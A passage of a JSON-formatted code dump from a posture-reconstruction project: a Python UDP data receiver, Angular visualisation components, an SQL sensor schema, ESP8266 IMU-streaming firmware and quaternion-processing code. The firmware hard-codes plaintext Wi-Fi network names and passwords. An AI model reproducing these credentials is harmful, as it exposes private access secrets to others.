= data.split(',')[1]\n if channel not in channels:\n ind = IPs.index(addr[0])\n Files[ind] = open(channel + \".csv\", 'w')\n #subprocess.Popen(\"mkfifo pipe\" + channel, shell=True)\n #Files[ind] = open(\"pipe\" + channel, 'w')\n \n\nprint(len(channels))\nwhile True:\n data, addr = sock.recvfrom(1024);\n print(data)\n try:\n channel = data.split(',')[1]\n except ValueError:\n continue\n #data = data.split(',')\n #data[0] = str(int(data[0])*3.1415926/180)\n timelist = datetime.now().strftime(\"%H:%M:%S.%f\").split(':')\n t = str(int(timelist[0])*3600 + int(timelist[1])*60 + float(timelist[2]))\n Files[ind].write(data + ',' + t + '\\n')\n Files[ind].flush()\n"
},
{
"alpha_fraction": 0.6444207429885864,
"alphanum_fraction": 0.6529631614685059,
"avg_line_length": 25.380281448364258,
"blob_id": "5f7edc86568cbc3d8ba9f5e546f8bb4ccd647f4e",
"content_id": "b15e0744e33c075263f146e562235a5c760e3c6d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "TypeScript",
"length_bytes": 1873,
"license_type": "no_license",
"max_line_length": 113,
"num_lines": 71,
"path": "/oriTrakHAR-master/rawDataVis/src/app/components/right-legend/right-legend.component.ts",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "import { Component, OnInit } from '@angular/core';\nimport { SockService } from '../../services/sock.service';\nimport { DataModelService } from '../../services/data-model.service';\n@Component({\n selector: 'app-right-legend',\n templateUrl: './right-legend.component.html',\n styleUrls: ['./right-legend.component.css']\n})\nexport class RightLegendComponent implements OnInit {\n status;\n colorPalette;\n constructor(private dataModel: DataModelService, private sock: SockService) {\n this.status = dataModel.status;\n this.colorPalette = dataModel.colorPalette;\n }\n\n ngOnInit() {\n }\n\n public objToArray(obj) {\n return Object.keys(obj);\n }\n\n public selectCluster(option) {\n this.status.selectedCluster = option;\n if (! this.dataModel.clusterData[option]) {\n this.sock.getClusterData(option);\n }\n }\n getKeys(obj) {\n return Object.keys(obj);\n }\n\n getStyle(cluster_id) {\n\n }\n\n getColor(cluster_id) {\n var color = ['rgb(', this.dataModel.colorPalette[cluster_id].join(','), ')'].join('')\n var white = 'rgb(255, 255, 255)'\n var ans\n if (this.status.clustersOnOff[cluster_id]) {\n ans = color\n } else {\n ans = white\n }\n return {\n 'background-color': ans,\n 'border-style': 'solid',\n 'border-width': '3px',\n 'border-color': color,\n 'border-radius': '10px',\n 'width': '80%',\n 'height': '30px',\n 'text-align': 'center'\n }\n }\n\n toggleClusterOnoff(cluster_id) {\n console.log(this.status.clustersOnOff)\n console.log(cluster_id)\n console.log( this.status.clustersOnOff[cluster_id])\n this.status.clustersOnOff[cluster_id] = !this.status.clustersOnOff[cluster_id]\n this.dataModel.updateDisplayClusterData()\n }\n\n // public getClusters() {\n // return Object.keys(this.dataModel.clusterData[this.status.availableClusters[this.status.selectedCluster]])\n // }\n\n}\n"
},
{
"alpha_fraction": 0.743834912776947,
"alphanum_fraction": 0.7468545436859131,
"avg_line_length": 39.551021575927734,
"blob_id": "9964894ad02998e267f1df394c4d7a00c577f3c6",
"content_id": "27155c0ea01b08a73ed6ef7164d5cdf5b8218687",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "TypeScript",
"length_bytes": 1987,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 49,
"path": "/oriTrakHAR-master/rawDataVis/src/app/app.module.ts",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "import { BrowserModule } from '@angular/platform-browser';\nimport { NgModule } from '@angular/core';\nimport { CommonModule } from '@angular/common';\n\nimport { AppComponent } from './app.component';\nimport { DataModelService } from './services/data-model.service';\nimport { SocketIoModule, SocketIoConfig } from './modules/ng2-socket-io';\nimport { SockService } from './services/sock.service';\nimport { wsAddr } from './serverAddr';\nimport { StickFigureComponent } from './components/stick-figure/stick-figure.component';\nimport { BsDropdownModule } from 'ngx-bootstrap';\nimport { AlertModule } from 'ngx-bootstrap';\nimport { TimepickerModule } from 'ngx-bootstrap/timepicker';\nimport { FormsModule } from '@angular/forms';\nimport { ShpereHistComponent } from './components/shpere-hist/shpere-hist.component';\nimport { Left3dVisComponent } from './components/left-3d-vis/left-3d-vis.component';\nimport { TopNavBarComponent } from './components/top-nav-bar/top-nav-bar.component';\nimport { BottomTimeLineComponent } from './components/bottom-time-line/bottom-time-line.component';\nimport { NouisliderModule } from 'ng2-nouislider';\nimport { MiddleMapComponent } from './components/middle-map/middle-map.component';\nimport { RightLegendComponent } from './components/right-legend/right-legend.component';\nimport { AngularOpenlayersModule } from 'ngx-openlayers';\nconst config: SocketIoConfig = { url: wsAddr, options: {} };\n\n@NgModule({\n declarations: [\n AppComponent,\n StickFigureComponent,\n ShpereHistComponent,\n Left3dVisComponent,\n TopNavBarComponent,\n BottomTimeLineComponent,\n MiddleMapComponent,\n RightLegendComponent\n ],\n imports: [\n BrowserModule,\n FormsModule,\n NouisliderModule,\n SocketIoModule.forRoot(config),\n BsDropdownModule.forRoot(),\n AlertModule.forRoot(),\n TimepickerModule.forRoot(),\n AngularOpenlayersModule\n ],\n providers: [SockService, DataModelService],\n bootstrap: [AppComponent]\n})\nexport class AppModule { }\n"
},
{
"alpha_fraction": 0.7882069945335388,
"alphanum_fraction": 0.7882069945335388,
"avg_line_length": 42.73684310913086,
"blob_id": "71127ceeab0e2a3c074a55987f5834d7bfab4155",
"content_id": "8204ddd655ac88cd6111dfc2395ca1a6912975b4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 831,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 19,
"path": "/README.md",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "# Posture-Reconstruction\n## oriTrakHAR-master\nYuhui's project\n## python-code\nPython code translated from oriTrakHAR-master:\n#### *left and right Dict_yzx*: \nDictionary in json mapping wrist euler to elbow euler\n#### *processData.processRow(files, timeSeries)*: \nRead quaternions from files, interpolated at times specified by timeSeries\n#### *processStream.processRow(files, timeSeries)*: \nRead quaternions from named pipes, interpolated at times specified by timeSeries\n#### *visualization*:\nVisualize quaternions loaded from either files or pipes, determined by the source of processRow\n#### *transformations*:\nUtility functions for handling quaternions\n## data_collection:\nReceive data from WiFi modules and save as csv files\n## hotspot_to_client:\nSwitch rpi between WiFi hotspot and client; Need a reboot to make those changes\n"
},
{
"alpha_fraction": 0.6531772613525391,
"alphanum_fraction": 0.6732441186904907,
"avg_line_length": 47.209678649902344,
"blob_id": "5685b815ee5d214ee41a021d9cd8741d39b419dc",
"content_id": "5cb237e9aa6712c18785ddb4aad6b6e8650af3ef",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 2990,
"license_type": "no_license",
"max_line_length": 104,
"num_lines": 62,
"path": "/oriTrakHAR-master/sensorDataCollection/dataServer/dbInit.sql",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "CREATE TABLE IF NOT EXISTS SensorData100Hz(\n id INTEGER PRIMARY KEY,\n server_id INTEGER NOT NULL,\n sensor_id INTEGER NOT NULL,\n server_send_timestamp INTEGER NOT NULL,\n sensor_synced_timestamp INTEGER NOT NULL,\n sensor_raw_timestamp INTEGER NOT NULL,\n quat_w REAL NOT NULL,\n quat_x REAL NOT NULL,\n quat_y REAL NOT NULL,\n quat_z REAL NOT NULL,\n gyro_x REAL NOT NULL,\n gyro_y REAL NOT NULL,\n gyro_z REAL NOT NULL,\n acc_x REAL NOT NULL,\n acc_y REAL NOT NULL,\n acc_z REAL NOT NULL\n);\nCREATE TABLE IF NOT EXISTS SensorData20Hz(\n id INTEGER PRIMARY KEY,\n server_id INTEGER NOT NULL,\n sensor_id INTEGER NOT NULL,\n server_send_timestamp INTEGER NOT NULL,\n sensor_synced_timestamp INTEGER NOT NULL,\n sensor_raw_timestamp INTEGER NOT NULL,\n magn_x REAL NOT NULL,\n magn_y REAL NOT NULL,\n magn_z REAL NOT NULL\n);\n\nCREATE TABLE IF NOT EXISTS SensorMessage(\n id INTEGER PRIMARY KEY,\n server_id INTEGER NOT NULL,\n sensor_id INTEGER NOT NULL,\n server_send_timestamp INTEGER NOT NULL,\n client_recv_timestamp INTEGER NOT NULL,\n client_send_timestamp INTEGER NOT NULL,\n server_recv_timestamp INTEGER NOT NULL,\n num_100hz_data INTEGER NOT NULL,\n num_20hz_data INTEGER NOT NULL\n);\n\nCREATE INDEX IF NOT EXISTS sensor_synced_timestamp_100 ON SensorData100Hz(sensor_synced_timestamp);\nCREATE INDEX IF NOT EXISTS server_send_timestamp_100 ON SensorData100Hz(server_send_timestamp);\nCREATE INDEX IF NOT EXISTS sensor_raw_timestamp_100 ON SensorData100Hz(sensor_raw_timestamp);\nCREATE INDEX IF NOT EXISTS id_100 ON SensorData100Hz(sensor_id, server_id);\n\nCREATE INDEX IF NOT EXISTS sensor_synced_timestamp_20 ON SensorData20Hz(sensor_synced_timestamp);\nCREATE INDEX IF NOT EXISTS server_send_timestamp_20 ON SensorData20Hz(server_send_timestamp);\nCREATE INDEX IF NOT EXISTS sensor_raw_timestamp_20 ON SensorData20Hz(sensor_raw_timestamp);\nCREATE INDEX IF NOT EXISTS id_20 ON SensorData20Hz(sensor_id, server_id);\n\nCREATE INDEX IF NOT EXISTS id_sensor_message ON SensorMessage(sensor_id, server_id);\nCREATE INDEX IF NOT EXISTS server_send_sensor_message ON SensorMessage(server_send_timestamp);\nCREATE INDEX IF NOT EXISTS client_recv_sensor_message ON SensorMessage(client_recv_timestamp);\nCREATE INDEX IF NOT EXISTS client_send_sensor_message ON SensorMessage(client_send_timestamp);\nCREATE INDEX IF NOT EXISTS server_recv_sensor_message ON SensorMessage(server_recv_timestamp);\n\nCREATE VIEW IF NOT EXISTS NUM_DATA AS\nSELECT server_id, sensor_id, SUM(num_100hz_data) AS num_data_100hz, SUM(num_20hz_data) AS num_data_20hz\nFROM SensorMessage\nGROUP BY server_id, sensor_id;\n\n"
},
{
"alpha_fraction": 0.41417911648750305,
"alphanum_fraction": 0.45895522832870483,
"avg_line_length": 18.14285659790039,
"blob_id": "4812104555d15f652f7747514928710513e9a3c3",
"content_id": "52e2c36a2020abc7ae5f247d0e2e3aed19e945f8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "TypeScript",
"length_bytes": 536,
"license_type": "no_license",
"max_line_length": 43,
"num_lines": 28,
"path": "/oriTrakHAR-master/robotVisualizationRealtime/src/app/services/data-model.service.ts",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "import { Injectable } from '@angular/core';\n\n@Injectable()\nexport class DataModelService {\n public status = {\n torso : {\n quaternion: {w: 1, x: 0, y: 0, z: 0}\n },\n head: {\n quaternion: {w: 1, x: 0, y: 0, z: 0}\n },\n rightUpper: {\n quaternion: {w: 1, x: 0, y: 0, z: 0}\n },\n rightLower: {\n quaternion: {w: 1, x: 0, y: 0, z: 0}\n },\n leftUpper: {\n quaternion: {w: 1, x: 0, y: 0, z: 0}\n },\n leftLower: {\n quaternion: {w: 1, x: 0, y: 0, z: 0}\n }\n };\n\n constructor() { }\n\n}\n"
},
{
"alpha_fraction": 0.43861672282218933,
"alphanum_fraction": 0.5025936365127563,
"avg_line_length": 26.645160675048828,
"blob_id": "ac3236ef51e3151d11913ef0612b63e0959b0f2b",
"content_id": "b2bc8c570ac43af1e547f42f24a07a765a4d5683",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1735,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 62,
"path": "/visualize_clock.py",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "import matplotlib.pyplot as plt\nimport numpy as np\n\ndef millis(time):\n timelist = time.split(':')\n t = int(timelist[0])*3600000+int(timelist[1])*60000+float(timelist[2])*1000\n if int(timelist[0]) < 5:\n t += 24*3600000\n return t\ninterval = 10000\n'''\nwith open('9008.csv') as f:\n l = f.readline();\n strlist = l.split(',')\n tw0 = int(strlist[-2])\n tpi0 = millis(strlist[-1])\n tw = int(strlist[-2]) + interval\n tpi = millis(strlist[-1]) + interval\n count1 = 0;\n count2 = 0;\n result1 = [];\n result2 = [];\n result3 = [];\n while l:\n strlist = l.split(',')\n if int(strlist[-2]) < tw:\n count1 += 1\n else:\n #print(count1)\n result1.append(count1)\n count1 = 0\n tw += interval\n if millis(strlist[-1]) < tpi:\n count2 += 1\n else:\n result2.append(count2)\n result3.append(millis(strlist[-1]) - tpi0 - int(strlist[-2]) + tw0)\n count2 = 0\n tpi += interval\n l = f.readline()\n'''\nn = 0\nwith open('9009.csv') as f:\n with open('9008.csv') as g:\n l1 = f.readline()\n l2 = g.readline()\n result = []\n while l1:\n n = n + 1\n if n%10 == 0:\n strlist1 = l1.split(',')\n strlist2 = l2.split(',')\n result.append(millis(strlist1[-1]) - millis(strlist2[-1]) - int(strlist1[-2]) + int(strlist2[-2]))\n l1 = f.readline()\n l2 = g.readline()\nresult = np.asarray(result)\n#result1 = np.asarray(result1)\n#result2 = np.asarray(result2)\n#result3 = np.asarray(result3)\nt = np.arange(0.0, len(result), 1)\nplt.plot(t, result)\nplt.show()\n\n \n\n\n \n"
},
{
"alpha_fraction": 0.6513410210609436,
"alphanum_fraction": 0.6538952589035034,
"avg_line_length": 26.964284896850586,
"blob_id": "58abc129a38247e7acdf6629d219975ddeba002c",
"content_id": "db091b123ef16e1378e5c94b624c42799db5cef4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "TypeScript",
"length_bytes": 783,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 28,
"path": "/oriTrakHAR-master/robotVisualizationRealtime/src/app/services/sock.service.ts",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "import { Injectable } from '@angular/core';\nimport { Socket } from '../modules/ng2-socket-io';\nimport { DataModelService } from './data-model.service';\n// import { AngleData } from '../prototypes';\n\n@Injectable()\nexport class SockService {\n\n constructor(private socket: Socket, private dataModel: DataModelService) {\n const self = this;\n var counter = 0\n\n socket.on('connect', (msg) => {\n console.log('on connect');\n });\n socket.on('newData', newDataHandle);\n\n function newDataHandle(msg) {\n // console.log(msg)\n dataModel.status[msg.id].quaternion.w = msg.quat.w\n dataModel.status[msg.id].quaternion.x = msg.quat.x\n dataModel.status[msg.id].quaternion.y = msg.quat.y\n dataModel.status[msg.id].quaternion.z = msg.quat.z\n }\n\n }\n\n}\n"
},
{
"alpha_fraction": 0.5985269546508789,
"alphanum_fraction": 0.652668297290802,
"avg_line_length": 25.686206817626953,
"blob_id": "d74b936112b44df3fa4e3b13f5397eb941e35cc3",
"content_id": "0b954997d8a310a8b00a05a2fdfaef47d5094249",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 7739,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 290,
"path": "/oriTrakHAR-master/sensorDataCollection/espBno055_streamming/espBno055_streamming.ino",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "#include <ESP8266WiFi.h>\n#include <ESP8266mDNS.h>\n#include <WiFiUdp.h>\n#include <ArduinoOTA.h>\n\n#include <Adafruit_BNO055_modified.h>\n#include <Adafruit_Sensor.h>\n#include <utility/imumaths.h>\n\n#include \"TimerObject.h\"\n\n#define CHIP_ID (0) // CHANGE THIS FOR EACH CHIP!!!!!!\n#define ESP8266\n#define OTA_WAIT_TIME (3000)\n#define SDA (0)\n#define SCL (4)\n#define BAUD_RATE (115200)\n#define BNO055_CAL_DELAY_MS (10)\n#define INTERVAL_100HZ (10)\n#define INTERVAL_20HZ (50)\n#define INTERVAL_1HZ (100)\n#define BOARD_LED (2)\n#define WORKING_BLINK_COUNT (20)\n#define CAL_BLINK_COUNT (5)\n#define DATA_BUFF_LENGTH (17)\n#define PORT (9000)\n // ID timestamp payload\n#define DATA_BUFF_100HZ_SIZE (60) // sizeof(utin32_t) + sizeof(utin32_t) + 13 * sizeof(float)\n#define DATA_BUFF_20HZ_SIZE (20) // sizeof(utin32_t) + sizeof(utin32_t) + 3 * sizeof(float)\n#define DATA_BUFF_1HZ_SIZE (12) // sizeof(utin32_t) + sizeof(utin32_t) + 1 * sizeof(float)\n\n\n\n// const char* ssid = \"yjinms\";\n// const char* password = \"1fdd2EE3b448@f432@2f\";\n// const char* host = \"192.168.0.6\";\n\nconst char* ssid = \"raspiDatalogger\";\nconst char* password = \"d]WJ/6Z\\\\jBu#]g0*Q]XT\";\nconst char* host = \"192.168.2.1\";\n\n\n// const char* host = \"192.168.4.1\";\n\nint led_val = 0;\nuint working_counter = 0;\nuint cal_counter = 0;\n\nTimerObject* timer_100Hz;\nTimerObject* timer_20Hz;\nTimerObject* timer_1Hz;\n\nuint32_t timeStamp100Hz;\nuint32_t timeStamp20Hz;\nuint32_t timeStamp1Hz;\n\n\nvolatile char dataBuff100hz[DATA_BUFF_100HZ_SIZE];\nvolatile char dataBuff20hz[DATA_BUFF_20HZ_SIZE];\nvolatile char dataBuff1hz[DATA_BUFF_1HZ_SIZE];\n\n\nuint32_t* timeStamp100Hz_p = (uint32_t *) (dataBuff100hz + 4);\nuint32_t* timeStamp20Hz_p = (uint32_t *) (dataBuff20hz + 4);\nuint32_t* timeStamp1Hz_p = (uint32_t *) (dataBuff1hz + 4);\n\nfloat* buff100hz = (float *) (dataBuff100hz + 8);\nfloat* buff20hz = (float *) (dataBuff20hz + 8);\nfloat* buff1hz = (float *) (dataBuff1hz + 8);\n\nimu::Quaternion quat;\nimu::Vector<3> gyro, lacc, acc, magn;\n\n\nbool ota_flag = true;\nbool mySetup_finished = false;\n\nAdafruit_BNO055 bno;\nWiFiClient client;\n\nvoid setup() {\n pinMode(BOARD_LED, OUTPUT);\n digitalWrite(BOARD_LED, 0);\n Serial.begin(BAUD_RATE);\n Serial.println(\"Booting\");\n WiFi.mode(WIFI_STA);\n WiFi.begin(ssid, password);\n while (WiFi.waitForConnectResult() != WL_CONNECTED) {\n Serial.println(\"Connection Failed! Rebooting...\");\n delay(5000);\n ESP.restart();\n }\n\n // Port defaults to 8266\n // ArduinoOTA.setPort(8266);\n\n // Hostname defaults to esp8266-[ChipID]\n ArduinoOTA.setHostname(\"myesp8266\");\n\n // No authentication by default\n // ArduinoOTA.setPassword((const char *)\"343\");\n\n ArduinoOTA.onStart([]() {\n Serial.println(\"Start\");\n });\n ArduinoOTA.onEnd([]() {\n Serial.println(\"\\nEnd\");\n });\n ArduinoOTA.onProgress([](unsigned int progress, unsigned int total) {\n Serial.printf(\"Progress: %u%%\\r\", (progress / (total / 100)));\n });\n ArduinoOTA.onError([](ota_error_t error) {\n Serial.printf(\"Error[%u]: \", error);\n if (error == OTA_AUTH_ERROR) Serial.println(\"Auth Failed\");\n else if (error == OTA_BEGIN_ERROR) Serial.println(\"Begin Failed\");\n else if (error == OTA_CONNECT_ERROR) Serial.println(\"Connect Failed\");\n else if (error == OTA_RECEIVE_ERROR) Serial.println(\"Receive Failed\");\n else if (error == OTA_END_ERROR) Serial.println(\"End Failed\");\n });\n ArduinoOTA.begin();\n Serial.println(\"Ready\");\n Serial.print(\"IP address: \");\n Serial.println(WiFi.localIP());\n\n if (!client.connect(host, PORT)) {\n Serial.println(\"Connection to dataServer failed!\");\n }\n // Attach chip id to each message\n uint32_t id = ESP.getChipId();\n uint32_t* id_p = (uint32_t*) dataBuff100hz;\n id_p[0] = id;\n id_p = (uint32_t*) dataBuff20hz;\n id_p[0] = id;\n id_p = (uint32_t*) dataBuff1hz;\n id_p[0] = id;\n digitalWrite(BOARD_LED, 1);\n}\n\n\nvoid readSensor100Hz() {\n quat = bno.getQuat();\n\n buff100hz[0] = quat.w();\n buff100hz[1] = quat.x();\n buff100hz[2] = quat.y();\n buff100hz[3] = quat.z();\n\n\n gyro = bno.getVector(Adafruit_BNO055::VECTOR_GYROSCOPE);\n buff100hz[4] = gyro.x();\n buff100hz[5] = gyro.y();\n buff100hz[6] = gyro.z();\n\n lacc = bno.getVector(Adafruit_BNO055::VECTOR_LINEARACCEL);\n buff100hz[7] = lacc.x();\n buff100hz[8] = lacc.y();\n buff100hz[9] = lacc.z();\n\n\n acc = bno.getVector(Adafruit_BNO055::VECTOR_ACCELEROMETER);\n buff100hz[10] = acc.x();\n buff100hz[11] = acc.y();\n buff100hz[12] = acc.z();\n\n\n timeStamp100Hz_p[0] = millis();\n\n client.write((char*) dataBuff100hz, DATA_BUFF_100HZ_SIZE);\n\n working_counter++;\n if (working_counter == WORKING_BLINK_COUNT) {\n working_counter = 0;\n led_val ^= 1;\n digitalWrite(BOARD_LED, led_val);\n }\n}\n\nvoid readSensor20Hz() {\n magn = bno.getVector(Adafruit_BNO055::VECTOR_MAGNETOMETER);\n buff20hz[0] = magn.x();\n buff20hz[1] = magn.y();\n buff20hz[2] = magn.z();\n timeStamp20Hz_p[0] = millis();\n client.write((char*) dataBuff20hz, DATA_BUFF_20HZ_SIZE);\n}\n\nvoid readSensor1Hz() {\n buff1hz[0] = (float) bno.getTemp();\n timeStamp1Hz_p[0] = millis();\n client.write((char*) dataBuff1hz, DATA_BUFF_1HZ_SIZE);\n\n}\n\nvoid mySetup() {\n bno = Adafruit_BNO055(55, 0x28);\n if(!bno.begin(SDA, SCL)) {\n Serial.println(\"bno not detected\");\n while(1);\n } else {\n Serial.println(\"bno detected!\");\n }\n displaySensorDetails(bno);\n displaySensorDetails(bno);\n displayCalStatus(bno);\n bno.setExtCrystalUse(true);\n timer_100Hz= new TimerObject(INTERVAL_100HZ);\n timer_100Hz -> setOnTimer(&readSensor100Hz);\n timer_20Hz= new TimerObject(INTERVAL_20HZ);\n timer_20Hz -> setOnTimer(&readSensor20Hz);\n timer_1Hz= new TimerObject(INTERVAL_1HZ);\n timer_1Hz -> setOnTimer(&readSensor1Hz);\n delay(300);\n timer_100Hz -> Start();\n timer_20Hz -> Start();\n timer_1Hz -> Start();\n}\n\nvoid displaySensorDetails(Adafruit_BNO055 bno) {\n sensor_t sensor;\n bno.getSensor(&sensor);\n Serial.print(\"Sensor: \");\n Serial.print(sensor.name);\n Serial.print(\"vDriver: \");\n Serial.print(sensor.version);\n Serial.print(\"UID: \");\n Serial.print(sensor.sensor_id);\n delay(100);\n}\n\nvoid displaySensorStatus(Adafruit_BNO055 bno) {\n uint8_t system_status, self_test_results, system_error;\n system_status = self_test_results = system_error = 0;\n bno.getSystemStatus(&system_status, &self_test_results, &system_error);\n Serial.print(\"SysStat: \");\n Serial.print(system_status);\n Serial.print(\"SelfTest: \");\n Serial.print(self_test_results);\n Serial.print(\"SysErr: \");\n Serial.println(system_error);\n delay(100);\n}\n\nvoid displayCalStatus(Adafruit_BNO055 bno) {\n uint8_t bno_system, bno_gyro, bno_accel, bno_mag;\n bno.getCalibration(&bno_system, &bno_gyro, &bno_accel, &bno_mag);\n while(bno_system != 3) {\n ArduinoOTA.handle();\n cal_counter++;\n if (cal_counter == CAL_BLINK_COUNT) {\n cal_counter = 0;\n led_val ^= 1;\n digitalWrite(BOARD_LED, led_val);\n // Serial.println(\"blink\");\n }\n bno.getCalibration(&bno_system, &bno_gyro, &bno_accel, &bno_mag);\n Serial.print(\"System: \");\n Serial.print(bno_system);\n Serial.print(\"gyro: \");\n Serial.print(bno_gyro);\n Serial.print(\"accel: \");\n Serial.print(bno_accel);\n Serial.print(\"mag: \");\n Serial.println(bno_mag);\n delay(BNO055_CAL_DELAY_MS);\n }\n led_val = 0;\n digitalWrite(BOARD_LED, led_val);\n\n}\n\n\nvoid loop() {\n ArduinoOTA.handle();\n if (! mySetup_finished) {\n mySetup();\n mySetup_finished = true;\n } else {\n if (client.connected()) {\n timer_100Hz -> Update();\n timer_20Hz -> Update();\n timer_1Hz -> Update();\n } else {\n client = WiFiClient();\n if (!client.connect(host, PORT)) {\n Serial.println(\"Connection to dataServer failed!\");\n delay(500);\n }\n }\n }\n}\n"
},
{
"alpha_fraction": 0.7041636109352112,
"alphanum_fraction": 0.7041636109352112,
"avg_line_length": 26.93877601623535,
"blob_id": "875f012b6660229cad93c4c4a706896e07014d0e",
"content_id": "60c05ddd47ca8532eadfca118db1f58bb2820955",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "TypeScript",
"length_bytes": 1369,
"license_type": "no_license",
"max_line_length": 131,
"num_lines": 49,
"path": "/oriTrakHAR-master/rawDataVis/src/app/components/top-nav-bar/top-nav-bar.component.ts",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "import { Component, OnInit } from '@angular/core';\nimport { SockService } from '../../services/sock.service';\nimport { DataModelService } from '../../services/data-model.service';\n\n@Component({\n selector: 'app-top-nav-bar',\n templateUrl: './top-nav-bar.component.html',\n styleUrls: ['./top-nav-bar.component.scss']\n})\nexport class TopNavBarComponent implements OnInit {\n public status;\n constructor(private dataModel: DataModelService, private sock: SockService) {\n this.status = this.dataModel.status;\n }\n\n ngOnInit() {\n }\n public objToArray(obj) {\n return Object.keys(obj);\n }\n\n public selectDate(date) {\n this.dataModel.updateStartTime(date);\n this.sock.updateHist();\n }\n\n public playWin() {\n this.dataModel.status.winPlaying = true;\n this.dataModel.windowPlay();\n }\n\n public stopWin() {\n this.dataModel.status.winPlaying = false;\n this.dataModel.stopPlay();\n }\n\n public toggleWindowFixed() {\n this.dataModel.status.windowFixed = !this.dataModel.status.windowFixed;\n this.dataModel.status.windowWidth = this.dataModel.status.histEndTime.valueOf() - this.dataModel.status.histStartTime.valueOf()\n }\n\n public selectSlowDown(option) {\n this.dataModel.status.windowPlaySlowDownFactor = option\n if (this.dataModel.windowPlayInterval) {\n this.dataModel.stopPlay();\n this.dataModel.windowPlay();\n }\n }\n}\n"
},
{
"alpha_fraction": 0.5617632269859314,
"alphanum_fraction": 0.5935418009757996,
"avg_line_length": 40.06842041015625,
"blob_id": "2a3824864549fce2ceb76a3f0025ce6b1740c023",
"content_id": "efe6fa1dd5e3dd5d42ccb50b3ce96885e7cb2c51",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7804,
"license_type": "no_license",
"max_line_length": 154,
"num_lines": 190,
"path": "/python-code/processStream.py",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "#euler_order: roll, pitch, yaw\n#original euler_order: yaw pitch roll\n#euler_order in oriTrakHAR: roll yaw pitch\n\nfrom scipy.interpolate import CubicSpline\nimport transformations\nimport numpy as np\nimport collections\nimport os\nimport time\nimport threading\nimport queue\nfrom pyquaternion import Quaternion\nthreshold = 1\n\ndef display(quat):\n print(quat[0], quat[1], quat[2], quat[3])\n\ndef processRow(data_dirs, t):\n torsoInterpo = createInterpolator(data_dirs[0])\n headInterpo = createInterpolator(data_dirs[1])\n leftInterpo = createInterpolator(data_dirs[2])\n rightInterpo = createInterpolator(data_dirs[3])\n\n torsoQuats = torsoInterpo[3].evaluate(t)\n headQuats = headInterpo[3].evaluate(t)\n leftQuats = leftInterpo[3].evaluate(t)\n rightQuats = rightInterpo[3].evaluate(t)\n torsoAccs = (torsoInterpo[0].evaluate(t), torsoInterpo[1].evaluate(t), torsoInterpo[2].evaluate(t))\n headAccs = (headInterpo[0].evaluate(t), headInterpo[1].evaluate(t), headInterpo[2].evaluate(t))\n leftAccs = (leftInterpo[0].evaluate(t), leftInterpo[1].evaluate(t), leftInterpo[2].evaluate(t))\n rightAccs = (rightInterpo[0].evaluate(t), rightInterpo[1].evaluate(t), rightInterpo[2].evaluate(t))\n \n\n #torsoOffset = Quaternion([-0.01483, 0.659224, 0.747234, 0.082578])\n #headOffset = Quaternion([-0.101687, 0.62569, 0.77248, 0.038392])\n torsoOffset = Quaternion([1, 0, 0, 0])\n headOffset = Quaternion([1, 0, 0, 0])\n for i in t:\n torsoQuat = next(torsoQuats)\n #print(torsoQuat[0], torsoQuat[1], torsoQuat[2], torsoQuat[3])\n torsoQuatValid = torsoQuat[0] is not None and not (torsoQuat[0] == torsoQuat[1] and torsoQuat[0] == torsoQuat[2] and torsoQuat[0] == torsoQuat[3])\n if torsoQuatValid:\n correctedTorsoQuat = torsoQuat*torsoOffset\n #display(correctedTorsoQuat)\n torsoAcc = []\n torsoAcc.append(next(torsoAccs[0]))\n torsoAcc.append(next(torsoAccs[1]))\n torsoAcc.append(next(torsoAccs[2]))\n torsoAccMag = np.linalg.norm(torsoAcc)\n if torsoAccMag < threshold:\n torsoOffset = Calibrate(torsoQuat)\n #print(torsoOffset)\n \n headQuat = next(headQuats)\n headQuatValid = headQuat[0] is not None and not (headQuat[0] == headQuat[1] and headQuat[0] == headQuat[2] and headQuat[0] == headQuat[3])\n if headQuatValid:\n correctedHeadQuat = headQuat*headOffset\n headAcc = []\n headAcc.append(next(headAccs[0]))\n headAcc.append(next(headAccs[1]))\n headAcc.append(next(headAccs[2]))\n headAccMag = np.linalg.norm(headAcc)\n if torsoQuatValid:\n headRelativeQuat = correctedTorsoQuat.inverse*correctedHeadQuat\n #headRelative = transformations.euler_from_quaternion(headRelativeQuat)\n headAccRelative = [headAcc[i] - torsoAcc[i] for i in range(0, 3)]\n if headAccMag < threshold:\n headOffset = Calibrate(headQuat)\n #print(headOffset)\n leftQuat = next(leftQuats)\n leftQuatValid = leftQuat[0] is not None and not (leftQuat[0] == leftQuat[1] and leftQuat[0] == leftQuat[2] and leftQuat[0] == leftQuat[3])\n if leftQuatValid:\n leftAcc = []\n leftAcc.append(next(leftAccs[0])) \n leftAcc.append(next(leftAccs[1]))\n leftAcc.append(next(leftAccs[2]))\n if torsoQuatValid:\n leftRelativeQuat = 